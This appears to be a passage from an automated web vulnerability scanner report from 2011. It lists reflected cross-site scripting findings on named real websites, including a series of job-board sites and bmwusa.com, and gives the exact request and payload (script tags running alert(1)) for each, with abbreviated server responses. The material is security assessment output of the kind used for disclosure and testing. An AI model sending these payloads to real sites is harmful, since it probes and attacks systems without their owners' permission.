| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:38 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=9ft9gv5ube Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:39 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:39 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:39 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:39 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:39 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:39 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:39 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 122002 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.aerospace |
| Path: | / |
| GET /?9a515"><script>alert(1)< Host: www.aerospacecrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:39 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=n2un0qqkik Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:39 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:39 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:39 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:39 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:39 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:39 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:39 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 109453 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.agricultu |
| Path: | / |
| GET /?44bfb"><script>alert(1)< Host: www.agriculturalcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:21:41 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=9e2jfijg4p Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:41 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:41 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:41 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:41 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:41 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:41 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:41 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 102580 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.aharrison |
| Path: | / |
| GET /?69719'><script>alert(1)< Host: www.aharrisonbarnes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:22:06 GMT Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8 X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=184erm2kcq Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Pingback: http://www.aharrison Set-Cookie: wpgb_visit_last_php Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Set-Cookie: wishlist_reg_cookie=a%3A2 Set-Cookie: wishlist_reg_cookie Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 91404 <script> function ValidatorTrim_video(s) { var m = s.match(/^\s*(\S+(\s+\S+) return (m == null) ? "" : m[1]; } function checkEmail_video(strng) { var error = ""; if (strng == "") ...[SNIP]... <form name='mrt_sub_form' id='mrt_sub_form' method='POST' action='http://www ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.architect |
| Path: | / |
| GET /?65f46"><script>alert(1)< Host: www.architecturecrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:22:00 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=t0mrcek43p Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:00 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:00 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:00 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:00 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:00 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:00 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:00 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 125437 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.auditorcr |
| Path: | / |
| GET /?d4ed6"><script>alert(1)< Host: www.auditorcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:22:00 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ifgrkcdgfg Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:00 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:00 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:00 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:00 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:00 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:00 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:00 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 125557 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.automotiv |
| Path: | / |
| GET /?3d55b"><script>alert(1)< Host: www.automotivecrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:22:01 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=00ecl9meki Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:02 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:02 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:02 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:02 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:02 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:02 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:02 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 109200 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.aviationc |
| Path: | / |
| GET /?2428f"><script>alert(1)< Host: www.aviationcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:22:10 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=lkn6lmhpp9 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:22:10 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:22:10 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:22:10 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:22:10 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:22:10 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:22:10 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:22:10 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 123255 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://www.bcgsearch.com |
| Path: | /searchresults.php |
| GET /searchresults.php?key Host: www.bcgsearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:34:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: PHPSESSID=a892eukh7o Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 68788 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>Attorney Jobs, Recruiting Firm, Placement Agency, Placement Service, Search ...[SNIP]... <link rel="canonical" href="http://www ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.bcgsearch.com |
| Path: | /searchresults.php |
| GET /searchresults.php?key Host: www.bcgsearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 20:01:35 GMT Server: Apache X-Powered-By: PHP/5.1.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: PHPSESSID=rmpahjvejl Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 68942 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>Attorney Jobs, Recruiting Firm, Placement Agency, Placement Service, Search ...[SNIP]... <link rel="canonical" href="http://www ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.bcgsearch.com |
| Path: | /searchresults.php |
| GET /searchresults.php?c5b4b"><script>alert(1)< Host: www.bcgsearch.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 19:34:38 GMT Server: Apache X-Powered-By: PHP/5.1.6 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Set-Cookie: PHPSESSID=oe75j7p7vu Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 68865 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <title>Attorney Jobs, Recruiting Firm, Placement Agency, Placement Service, Search ...[SNIP]... <link rel="canonical" href="http://www ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.bilingual |
| Path: | / |
| GET /?70508"><script>alert(1)< Host: www.bilingualcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:23:13 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=no661p4827 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:13 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:13 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:13 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:13 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:13 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:13 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:13 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 133156 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.biotechcr |
| Path: | / |
| GET /?10d14"><script>alert(1)< Host: www.biotechcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:23:11 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=rugpvnfefu Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:11 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:11 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:11 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:11 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:11 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:11 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:11 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 119759 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.bluecolla |
| Path: | / |
| GET /?a6b61"><script>alert(1)< Host: www.bluecollarcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:23:47 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=6aoaisevp9 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:47 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:47 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:47 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:47 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:47 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:47 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:47 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 149457 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.bmwusa.com |
| Path: | /Secured/Content/Forms |
| GET /Secured/Content9d8ef'-alert(1)- Host: www.bmwusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VisitorID=89326a93-bb02 |
| HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 21 Jan 2011 19:52:57 GMT Content-Length: 855 Connection: close Set-Cookie: NSC_CNX_21529_64.29.204 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> </title>< ...[SNIP]... <![CDATA[ window.top.location.href = '/Secured/Content/Forms ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www.bmwusa.com |
| Path: | /Secured/Content/Forms |
| GET /Secured/Content/Formsb684e'-alert(1)- Host: www.bmwusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: VisitorID=89326a93-bb02 |
| HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Fri, 21 Jan 2011 19:53:01 GMT Content-Length: 855 Connection: close Set-Cookie: NSC_CNX_21529_64.29.204 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> </title>< ...[SNIP]... <![CDATA[ window.top.location.href = '/Secured/Content/Forms ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.businessa |
| Path: | / |
| GET /?49621"><script>alert(1)< Host: www.businessanalystc Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:23:51 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=nko903j62s Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:51 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:51 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:51 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:51 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:51 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:51 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:51 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 124014 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.businessd |
| Path: | / |
| GET /?9aad7"><script>alert(1)< Host: www.businessdevelopm Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:23:47 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=v9534hooe5 Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:47 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:47 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:47 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:47 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:47 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:47 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:47 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 116498 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.callcente |
| Path: | / |
| GET /?c6504"><script>alert(1)< Host: www.callcentercrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:23:51 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=ukmvtrcjop Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:51 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:51 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:51 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:51 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:51 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:51 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:51 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 128714 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.chefcrossing |
| Path: | / |
| GET /?7e49f"><script>alert(1)< Host: www.chefcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:23:52 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=h114rspv6d Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:52 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:52 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:52 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:52 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:52 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:52 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:52 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 108693 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.civilengi |
| Path: | / |
| GET /?7038b"><script>alert(1)< Host: www.civilengineering Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
